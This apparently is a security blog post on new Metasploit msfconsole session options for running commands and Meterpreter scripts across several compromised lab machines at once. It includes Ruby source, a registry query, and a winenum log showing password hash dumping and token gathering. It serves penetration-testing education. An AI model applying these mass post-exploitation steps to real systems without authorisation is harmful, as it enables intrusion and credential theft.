Security Weekly
Content

New Options in Msfconsole Sessions Command

Metasploit recently added 2 new options to the sessions command in msfconsole. This 2 options are the ability to run commands on all open sessions and to run a Meterpreter script on all sessions that are of Meterpreter type. I consider this 2 options game changers when it comes to post exploitation since now one can run a command thru out a series of shells and be able to automate all sessions with Meterpreter at the same time.

Here is the output of the sessions command showing all options, the –c for the command execution and the –s for script execution. 

msf exploit(handler) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions.
    -c <opt>  Run a command on all live sessions
    -d <opt>  Detach an interactive session
    -h        Help banner.
    -i <opt>  Interact with the supplied session identifier.
    -k <opt>  Terminate session.
    -l        List all active sessions.
    -q        Quiet mode.
    -s <opt>  Run a script on all live meterpreter sessions
    -v        List verbose fields.

msf exploit(handler) >

Currently I have 5 session open to different systems all behind a series of firewalls that is why all sessions appear to come from a single IP. 

msf exploit(handler) > sessions -l 

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441
  2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920
  3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396
  4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686
  5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197

msf exploit(handler) >

Another very useful option that was added is the –v for verbose, this lets us know if the session was the result of an exploit, what exploit or received by Multi Handler.

msf exploit(handler) > sessions -v

Active sessions
===============

  Id  Description  Tunnel                                     Via
  --  -----------  ------                                     ---
  1   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:50441  multi/handler
  2   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:54920  multi/handler
  3   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:1396   multi/handler
  4   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:61686  multi/handler
  5   Meterpreter  192.168.1.235:4444 -> 192.168.1.138:57197  multi/handler

msf exploit(handler) >

 

Here is the code that is executed when the –c option is ran:

  1: cmds.each do |cmd|



  2: 	framework.sessions.each_sorted do |s|



  3: 		session = framework.sessions.get(s)



  4: 		print_status("Running '#{cmd}' on session #{s} (#{session.tunnel_peer})")



  5: 		if (session.type == "meterpreter")



  6: 			c,args = cmd.split(' ', 2)



  7: 			begin



  8: 				process = session.sys.process.execute(c, args, {



  9: 						'Channelized' => true,



 10: 						'Hidden'      => true



 11: 					})



 12: 			rescue ::Rex::Post::Meterpreter::RequestError



 13: 				print_error("Failed: #{$!.class} #{$!}")



 14:



 15: 			end



 16: 			print_line(process.channel.read) if process and process.channel



 17: 		elsif session.type == "shell"



 18: 			# Then it's a regular shell, just send the command



 19: 			# to the session's stdin.



 20: 			session.write_shell(cmd + "n")



 21: 			# read_shell blocks with no timeout, so we wrap



 22: 			# it in a select in case there is no output



 23: 			# from the command



 24: 			if select([session.rstream],nil,nil,3)



 25: 				output = session.read_shell



 26: 				print_line(output)



 27: 			end



 28: 		end



 29: 		# If the session isn't a meterpreter or shell type, it



 30: 		# could be a VNC session (which can't run commands) or



 31: 		# something custom (which we don't know how to run



 32: 		# commands on), so don't bother.



 33: 	end



 34: end



As it can be seen in the line 1 and 2 all commands are iterated one by one against each available session, the in likes 5 and 17 the sessions are checked to see if each one either a Meterpreter shell or a simple command Shell, this means we can write plug-ins that can automate against both types of shell using this code as example. As it can be seen in line 8 the type of command that we can run is a system command so none of the other Meterpreter commands can be used. Also on important thing to notice is that the rules for operating in a shell apply so one must be careful not to run commands that can break a shell like WMIC or certain types of SC. Lets run the hostname command on all shells:




msf exploit(handler) > sessions -c hostname
[*] Running 'hostname' on session 1 (192.168.1.138:50441)
winxplab01

[*] Running 'hostname' on session 2 (192.168.1.138:54920)
win2k3lab01

[*] Running 'hostname' on session 3 (192.168.1.138:1396)
win701

[*] Running 'hostname' on session 4 (192.168.1.138:61686)
winvis01

[*] Running 'hostname' on session 5 (192.168.1.138:57197)
WIN-YR4V852V71Y

msf exploit(handler) > 




Now if we want to run commands with arguments we have to enclosed the command and the arguments in quotes, also remember that since this is ruby special characters must be escaped where it applies.  For example:




msf exploit(handler) > sessions -c 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName'
[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 1 (192.168.1.138:50441)

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion
    ProductName    REG_SZ    Microsoft Windows XP


[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 2 (192.168.1.138:54920)

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion
    ProductName    REG_SZ    Microsoft Windows Server 2003


[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 3 (192.168.1.138:1396)

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion
    ProductName    REG_SZ    Windows 7 Enterprise


[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 4 (192.168.1.138:61686)

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion
    ProductName    REG_SZ    Windows Vista (TM) Enterprise


[*] Running 'reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersion" /v ProductName' on session 5 (192.168.1.138:57197)

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion
    ProductName    REG_SZ    Windows Server (R) 2008 Enterprise


msf exploit(handler) > 




The –s option for running script is also an important one that will allow an attacker to automate several actions against a large number of sessions. Here is where I see that several steps will have to be taken when writing scripts to be used with this option, this are:
  • Proper logging of data will become very important do to the possibility that a large number of shells are processed.
  • Logs should reference the host name or host local IP of a target since many systems are now behind NAT firewalls.
  • Multi Threading will be of great importance since each session is handle sequentially so having Multi Threaded scripts will be a great time saver.
  • Scripts should at least output the hostname so the attacker can now what host he is currently running the script against.
  • At the moment the script must run without options.

Here is the code executed when executing this option:

  1: if (not script.nil?)



  2: 	print_status("Running script #{script} on all meterpreter sessions ...")



  3: 	framework.sessions.each_sorted do |s|



  4: 		if ((session = framework.sessions.get(s)))



  5: 			if (session.type == "meterpreter")



  6: 				print_status("Session #{s} (#{session.tunnel_peer}):")



  7: 				begin



  8: 					client = session



  9: 					client.execute_script(script, binding)



 10: 				rescue ::Exception => e



 11: 					log_error("Error executing script: #{e.class} #{e}")



 12: 				end



 13: 			end



 14: 		end



 15: 	end



 16: else



 17: 	print_error("No script specified!")



 18: end




As it can be seen in line 5 only the sessions that are of Meterpreter type are the ones that will be interacted with.


Here is a summarized version of running winenum:






   1: msf exploit(handler) > sessions -s winenum




   2: [*] Running script winenum on all meterpreter sessions ...




   3: [*] Session 1 (192.168.1.138:50441):




   4: [*] Running Windows Local Enumerion Meterpreter Script




   5: [*] New session on 192.168.1.138:50441...




   6: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/WINXPLAB01_20091225.4410-04411.txt




   7: [*] Checking if WINXPLAB01 is a Virtual Machine ........




   8: [*] BIOS Check Failed




   9: [*]     This is a VMWare virtual Machine




  10: [*] Running Command List ...




  11: [*]     running command cmd.exe /c set




  12: [*]     running command ipconfig /all




  13: ..........




  14: [*] Running WMIC Commands ....




  15: [*]     running command wmic computersystem list brief




  16: ..........




  17: [*] Extracting software list from registry




  18: [*] Dumping and Downloading the Registry entries for Configured Wireless Networks




  19: [*]     Exporting HKLMSoftwareMicrosoftWZCSVCParametersInterfaces




  20: [*]     Compressing key into cab file for faster download




  21: [*]     Downloading wlan_20091225.4410-04411.cab to -> /home/carlos/.msf3/logs/winenum/WINXPLAB01_20091225.4410-04411/wlan_20091225.4410-04411.cab




  22: [*]     Deleting left over files




  23: [*] Dumping password hashes...




  24: [*] Hashes Dumped




  25: [*] Getting Tokens...




  26: [*] All tokens have been processed




  27: [*] Done!




  28: [*] Session 2 (192.168.1.138:54920):




  29: [*] Running Windows Local Enumerion Meterpreter Script




  30: [*] New session on 192.168.1.138:54920...




  31: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN2K3LAB01_20091225.4538-95293/WIN2K3LAB01_20091225.4538-95293.txt




  32: [*] Checking if WIN2K3LAB01 is a Virtual Machine ........




  33: [*]     This is a VMware Workstation/Fusion Virtual Machine




  34: [*] Running Command List ...




  35: [*]     running command cmd.exe /c set




  36: ..........




  37: [*] Running WMIC Commands ....




  38: [*]     running command wmic computersystem list brief




  39: ..........




  40: [*] Extracting software list from registry




  41: [*] Dumping password hashes...




  42: [*] Hashes Dumped




  43: [*] Getting Tokens...




  44: [*] All tokens have been processed




  45: [*] Done!




  46: [*] Session 3 (192.168.1.138:1396):




  47: [*] Running Windows Local Enumerion Meterpreter Script




  48: [*] New session on 192.168.1.138:1396...




  49: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN701_20091225.4637-88208/WIN701_20091225.4637-88208.txt




  50: [*] Checking if WIN701 is a Virtual Machine ........




  51: [*]     This is a VMware Workstation/Fusion Virtual Machine




  52: [*] Checking if UAC is enabled ...




  53: [*]     UAC is Enabled




  54: [*] Running Command List ...




  55: [*]     running command cmd.exe /c set




  56: ..........




  57: [*] Running WMIC Commands ....




  58: [*]     running command wmic computersystem list brief




  59: ..........




  60: [*] Extracting software list from registry




  61: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges




  62: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.




  63: [*] Getting Tokens...




  64: [*] Error Getting Tokens: Rex::TimeoutError Operation timed out.




  65: [*] Done!




  66: [*] Session 4 (192.168.1.138:61686):




  67: [*] Running Windows Local Enumerion Meterpreter Script




  68: [*] New session on 192.168.1.138:61686...




  69: [*] Saving report to /home/carlos/.msf3/logs/winenum/WINVIS01_20091225.4927-83932/WINVIS01_20091225.4927-83932.txt




  70: [*] Checking if WINVIS01 is a Virtual Machine ........




  71: [*]     This is a VMware Workstation/Fusion Virtual Machine




  72: [*] Checking if UAC is enabled ...




  73: [*]     UAC is Enabled




  74: [*] Running Command List ...




  75: [*]     running command cmd.exe /c set




  76: ..........




  77: [*] Running WMIC Commands ....




  78: [*]     running command wmic computersystem list brief




  79: ..........




  80: [*] Extracting software list from registry




  81: [*] UAC is enabled, Wireless key Registry could not be dumped under current privileges




  82: [-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.




  83: [*] Getting Tokens...




  84: [*] All tokens have been processed




  85: [*] Done!




  86: [*] Session 5 (192.168.1.138:57197):




  87: [*] Running Windows Local Enumerion Meterpreter Script




  88: [*] New session on 192.168.1.138:57197...




  89: [*] Saving report to /home/carlos/.msf3/logs/winenum/WIN-YR4V852V71Y_20091225.5019-40179/WIN-YR4V852V71Y_20091225.5019-40179.txt




  90: [*] Checking if WIN-YR4V852V71Y is a Virtual Machine ........




  91: [*]     This is a VMware Workstation/Fusion Virtual Machine




  92: [*] Running Command List ...




  93: [*]     running command cmd.exe /c set




  94: ..........




  95: [*] Running WMIC Commands ....




  96: [*]     running command wmic computersystem list brief




  97: ..........




  98: [*] Extracting software list from registry




  99: [-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.




 100: [*] Getting Tokens...




 101: [*] All tokens have been processed




 102: [*] Done!




 103: msf exploit(handler) > 






As it can be seen the Framework is advancing a great number of features and new options are being added. I do have to say that the path in which the HD moved the Framework when joining forces with Rapid7 is paying off in a more robust and faster release cycle.
Carlos Perez

Carlos is currently the Principal Consultant, Team Lead for Research at TrustedSec and well-known for his research on both Metasploit and Windows Powershell. His blog www.darkoperator.com carries the tag line: “Shell Is Only The Beginning”.

Related

DevSecOps Scanning Challenges & Tips

There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […]
It Should Be ‘Cybersecurity Culture Month’

It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture.That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly.“If your security awareness program […]

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds